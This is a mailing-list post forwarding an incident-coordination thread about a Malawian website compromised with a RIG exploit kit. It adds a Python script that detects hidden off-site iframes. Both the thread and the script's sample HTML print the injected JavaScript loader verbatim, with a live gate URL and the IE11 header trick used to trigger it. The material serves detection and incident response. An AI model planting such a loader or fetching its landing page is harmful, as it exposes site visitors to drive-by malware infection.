[Cyber-security-tech-mw-l] Fwd: Re: IIDINCIDENT-320592# Exploit Kit activity on 41.216.230.122 - exploitsuniversity.com

Dr Paulos B Nyirenda paulos at sdnp.org.mw
Tue Jan 3 15:41:08 CAT 2017


Here is a cyber security complaint example made by AfricaCERT on behalf of the United States 
Department of Health and Human Services, about a compromised website traced to Malawi that 
has a RIG exploit kit placed in its source code.  

We need to be aware of such incidents as we develop the Malawi National Cyber Security 
Strategy, as we are doing now. Can we learn from it?

Regards,

Dr Paulos B Nyirenda
NIC.MW & .mw ccTLD
http://www.registrar.mw


------- Forwarded message follows -------
Subject:	Fwd: Re: IIDINCIDENT-320592# Exploit Kit activity on 41.216.230.122 - exploitsuniversity.com
To:	paulos at sdnp.org.mw
From:	Jean-Robert Hountomey <hrobert at africacert.org>
Date sent:	Tue, 3 Jan 2017 02:48:08 -0600


Hi Paulos,
Thanks Very much. He has responded and is investigating. I will call IID later today.
Thanks.
Regards.
Jean-Robert.

-------- Forwarded Message -------- 
Subject:	Re: IIDINCIDENT-320592# Exploit Kit activity on 41.216.230.122 - exploitsuniversity.com
Date:	Tue, 03 Jan 2017 10:30:38 +0200
From:	Saman K Dissanayake <saman at globemw.net>
To:	alert at internetidentity.com, globalcc at africacert.org

Dear All

Well noted. Let me investigate locally, identify who the right customer is and take 
necessary action accordingly.

Once we have identified the right client, we will take necessary action 
accordingly.

Saman
 

------- Forwarded message follows -------
Date sent:	Tue, 03 Jan 2017 10:24:04 +0200
Subject:	Re: SAMAN: (Fwd)  help with coordination in mw
From:	Saman K Dissanayake <saman at globemw.net>
To:	Dr Paulos B Nyirenda <paulos at sdnp.org.mw>


Dear Paulos

Let me investigate internally and advise them to get in touch with the specific client for 
the same.

I am quite sure the client may be hosting their web on our IP, or something related to that.

I will update you shortly.

Saman
 


From: Dr Paulos B Nyirenda <paulos at sdnp.org.mw>
Date: Mon, 02 Jan 2017 23:04:46 +0200
To: "D.M.S.K.Dissanayake" <saman at globemw.net>
Cc: Dr Paulos B Nyirenda <paulos at sdnp.org.mw>
Subject: SAMAN: (Fwd) help with coordination in mw


Saman,

Here is a CERT complaint involving an IP address that seems to be on the Globe Network.

Can you please review this and let me know if there is anything that you can do about it?

Do you need help ?

Such CERT reports could benefit others if properly circulated. Would it be ok with you and 
with Globe if I circulated this to the MISPA e-mail list?

Regards,

PC
======================
Dr Paulos B Nyirenda
NIC.MW & .mw ccTLD
http://www.registrar.mw

------- Forwarded message follows -------
Subject:	[SPAM] help with coordination in mw
To:	paulos at sdnp.org.mw, "ernest.boka at africacert.org" <ernest.boka at africacert.org>
From:	Jean-Robert Hountomey <hrobert at africacert.org>
Date sent:	Sat, 31 Dec 2016 16:16:38 -0600



Dear Paulos,


There is a complaint on behalf of the United States Department of Health 
and Human Services.

There is a compromised website that has a RIG exploit kit placed in 
its source code.

The provider of the site has been contacted several times over the 
past month and no longer wishes to be contacted unless someone is sent 
locally.

Our investigation team can confirm that no action has been taken on 
this site to remove the exploit kit.

Do you know someone we can contact for assistance?

Compromised URL:  
http://www.exploitsuniversity.com/index.php/academic-programs 
IP: 41.216.230.122
Length of incident: 1543 hours(live)
Provider: GlobalMW.net

inetnum:        41.216.230.0 - 41.216.230.127
netname:        WIRELESS-BROADBAND-BT-GIL
descr:          Use for broadband wireless Customer in Blantyre
country:        MW
admin-c:        gil-td
tech-c:         gil-td
status:         ASSIGNED PA
mnt-by:         GIL-MNT
source:         AFRINIC # Filtered
parent:         41.216.228.0 - 41.216.231.255


person:         Saman K dissanayake
address:        P O Box 5025
                limbe
                malawi
phone:          +2658841363
fax-no:         +2651841854
nic-hdl:        gil-td
source:         AFRINIC # Filtered




Thanks.

Regards.

Jean-Robert
------- End of forwarded message -------
  
------- End of forwarded message -------







On 31/12/2016, 9:38 AM, "alert at internetidentity.com"
<alert at internetidentity.com> wrote:

>Hi team,
>
>My name is Keith and I am contacting you from a cyber security company in
>the United States on behalf of the United States Department of Health and
>Human Services. We've run into some difficulty with a compromised website
>that has a RIG exploit kit placed in it's source code. We've contacted
>the provider of the site several times over the past month, and we just
>received word yesterday that the provider no longer wishes to be
>contacted unless we send someone locally. Our investigation team can
>confirm that no action has been taken on this site to remove the exploit
>kit.
>
>I will copy as much information as I can from the correspondence between
>our team, the provider, and our investigative team.
>
>Compromised URL:  
>http://www.exploitsuniversity.com/index.php/academic-programs
>IP: 41.216.230.122
>Length of incident: 1543 hours(live)
>Provider: GlobalMW.net
>
>
>Notes:
>This URL was submitted to us by HHS. It was then sent over to our Tier II
>team for investigation. The team came back with a template to send to all
>providers for compromised websites.
>
>==Summary==
>Hi Sanjeewa,
>
>My name is Keith and I'm a fraud analyst from IID. I'm not sure if you
>had received our previous email, but our Tier II team(the only one who
>can check if these are still live for us) stated that this URL is still
>showing the exploit kit iframe.
>
>(Please note that all URLs within this message have been disabled by
>converting 'http://' to 'hXXp://' and '.' to '[.]'; these changes must
>be reversed before attempting to access any URLs in this message.)
>
>The exploit kit iframe is still present at the following URL:
>
>hXXp://www[.]exploitsuniversity[.]com/index.php/academic-programs
>
>We used following curl command to retrieve the malicious iframe:
>
>curl -L -H 'Referer:
>hXXp://www[.]exploitsuniversity[.]com/index.php/academic-programs' -H
>'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0)
>like Gecko' 
>'hXXp://www[.]exploitsuniversity[.]com/index.php/academic-programs'
>
>This command (after removing the XXs and [.]s) returned the source code
>of the page. You can see the malicious iframe is at the very bottom of
>the source, after all of the page components:
>
><script type="text/javascript"> var anhso =
>document.createElement("iframe"); var ezbudf = ""; anhso.style.width =
>"16px"; anhso.style.height = "12px"; anhso.style.border = "0px";
>anhso.frameBorder = "0"; anhso.setAttribute("frameBorder", "0");
>document.body.appendChild(anhso); ezbudf =
>"http://qz18l.governaningret.top/?znePf7KUKx3LD4A=l3SKfPrfJxzFGMSUb-nJDa9G
>P0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQ
>LfyhSWksODrkHcaAJNqcOWHbBt2lqnnOASIZp1wESKvGNQyehOQFFd"; anhso.src =
>ezbudf; </script> 
>
>If you aren't seeing the malicious iframe, please note that it only
>displays ONCE to any given IP address. If you attempt to visit the page
>again from the same IP, the malicious iframe will no longer appear.
>Furthermore, public proxy services (such as Tor) are often excluded from
>viewing the malicious iframe even on the first visit. As such, we
>recommend using a private VPN service in order to properly investigate
>exploit kit content. Attached are some screenshots from my terminal.
>
>I hope this helps.
>
>Best regards,
>
>Keith N
>Fraud Analyst
>IID Security Team
>==end summary==
>
>That was not the original template we sent to Sanjeewa, who we were told
>was the point of contact for GlobalMW, the provider for this IP address.
>Sanjeewa works in Software Development. We were told to contact their
>department from Customer Support via a phone connection made on 12/8/16.
>That was my reply to him after he was unable to verify the malicious
>iframe. Our Tier II team then came back and reported further instructions
>such as which VPN service to use, and we were then told to not to contact
>Sanjeewa further. So I'm not really sure what to do with this anymore, as
>it's still an active exploit, but unless we go to the registrar and ask
>that the domain be NX'd, which is a long shot due to policies in place to
>prevent requests like those, our other option is either Law Enforcement
>or CERT. Sanjeewa requested that maybe someone could assist him locally.
>I know AfricaCERT has several countries under their purview, so I was
>hoping that one of your team might be able to assist Sanjeewa in
>reproducing the malicious iframe so that he can take necessary action on
>this site. If Sanjeewa wishes to no longer be part of working on this
>issue, there's others that may be willing to work on this to get it
>removed. The email lists for the abuse contacts we have are CC'd on this
>email, as well as the Network Engineer who's name appears on the IPWhois
>and Sanjeewa in Web Development.
>
>I hope to hear back regarding AfricaCERT's assistance on this issue. If
>you have any other questions, feel free to write back and either myself
>or one of my team will respond within the day.
>
>Best regards,
>
>Keith N
>Fraud Analyst
>IID Security Team
>+1 253-590-4100 x3 -> x4



------- End of forwarded message -------
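Added example, not part of the thread above: a small Python script that does, offline, what the IID analyst asked the provider to do by hand. It scans fetched page source for a script block that creates an iframe, shrinks it to a few pixels and points it at a host other than the page's own, then reports the landing URL in the hXXp:// and [.] form used in the thread. The surrounding HTML is constructed; the final script block in the sample is the loader quoted in the analyst's message. The fetch helper mirrors the Referer and User-Agent headers of the curl command in the thread and is deliberately not called in the offline run, because of the once-per-IP behaviour the analyst describes. Function names (fetch_like_ie11, find_injected_iframes, defang) are this example's own.

```python
import re
from urllib.parse import urlparse
from urllib.request import Request, urlopen

# Headers the IID analyst used (curl -L -H Referer -H User-Agent): an IE11
# on Windows 7 User-Agent and a same-site Referer, which is what the EK
# gate on the compromised site expects before it serves the loader.
IE11_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"

_SCRIPT = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
_IFRAME_CREATE = re.compile(r"""createElement\(\s*["']iframe["']\s*\)""", re.I)
_PX = re.compile(r"""style\.(width|height)\s*=\s*["'](\d+)px["']""", re.I)
_URL = re.compile(r"""["'](https?://[^"']+)["']""", re.I)


def fetch_like_ie11(url, referer=None):
    """Fetch page source the way the thread's curl command does.
    Not called in the offline demo. Caveat from the thread: the gate serves
    the injection only once per source IP and usually not to Tor exits, so
    a second fetch from the same address will most likely look clean."""
    req = Request(url, headers={"User-Agent": IE11_UA, "Referer": referer or url})
    with urlopen(req, timeout=20) as resp:  # urlopen follows redirects like -L
        return resp.read().decode("utf-8", "replace")


def defang(url):
    """hXXp:// and host dots to [.] (the convention used in the thread), so a
    landing URL can be pasted into a report without being clickable."""
    p = urlparse(url)
    safe = p.scheme.replace("http", "hXXp") + "://" + p.netloc.replace(".", "[.]")
    return safe + url[len(p.scheme) + 3 + len(p.netloc):]


def find_injected_iframes(html, page_url, max_px=50):
    """Return one dict per <script> block that creates an iframe, sets it to
    a few pixels and gives it an off-site src. Variable names are randomised
    per infection (anhso/ezbudf on the compromised page), so the structure is
    matched rather than the names."""
    own_host = urlparse(page_url).netloc.lower()
    hits = []
    for m in _SCRIPT.finditer(html):
        body = m.group(1)
        if not _IFRAME_CREATE.search(body):
            continue
        dims = {k.lower(): int(v) for k, v in _PX.findall(body)}
        offsite = [u for u in _URL.findall(body)
                   if urlparse(u).netloc.lower() != own_host]
        if not offsite:
            continue  # same-site iframes (menus, embeds) are not what we hunt
        hits.append({
            "host": urlparse(offsite[0]).netloc,
            "src": defang(offsite[0]),
            "width": dims.get("width"),
            "height": dims.get("height"),
            "hidden": bool(dims) and all(v <= max_px for v in dims.values()),
        })
    return hits


PAGE_URL = "http://www.exploitsuniversity.com/index.php/academic-programs"

# Constructed page body. The first script is a benign same-site iframe; the
# last script block is the loader quoted verbatim in the thread.
SAMPLE_HTML = """<html><head><title>Academic Programs</title>
<script type="text/javascript">var nav = document.createElement("iframe");
nav.style.width = "800px"; nav.style.height = "600px";
nav.src = "http://www.exploitsuniversity.com/index.php/calendar";
document.body.appendChild(nav);</script></head>
<body><h1>Academic Programs</h1><p>Faculties and courses offered.</p>
<script type="text/javascript"> var anhso = document.createElement("iframe"); var ezbudf = ""; anhso.style.width = "16px"; anhso.style.height = "12px"; anhso.style.border = "0px"; anhso.frameBorder = "0"; anhso.setAttribute("frameBorder", "0"); document.body.appendChild(anhso); ezbudf = "http://qz18l.governaningret.top/?znePf7KUKx3LD4A=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWksODrkHcaAJNqcOWHbBt2lqnnOASIZp1wESKvGNQyehOQFFd"; anhso.src = ezbudf; </script>
</body></html>"""

# The same page with the loader cut off, as the provider would see it on a
# second fetch from an IP the gate has already served.
CLEAN_HTML = SAMPLE_HTML[:SAMPLE_HTML.rfind("<script")] + "</body></html>"

if __name__ == "__main__":
    for hit in find_injected_iframes(SAMPLE_HTML, PAGE_URL):
        print(hit)
    print("clean copy:", find_injected_iframes(CLEAN_HTML, PAGE_URL))
```

The same-site iframe in the head is skipped on purpose, so the check reports only the 16x12 frame whose src leaves the site; that off-site host, not the script's variable names, is the indicator worth passing to the provider or blocking at the resolver.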
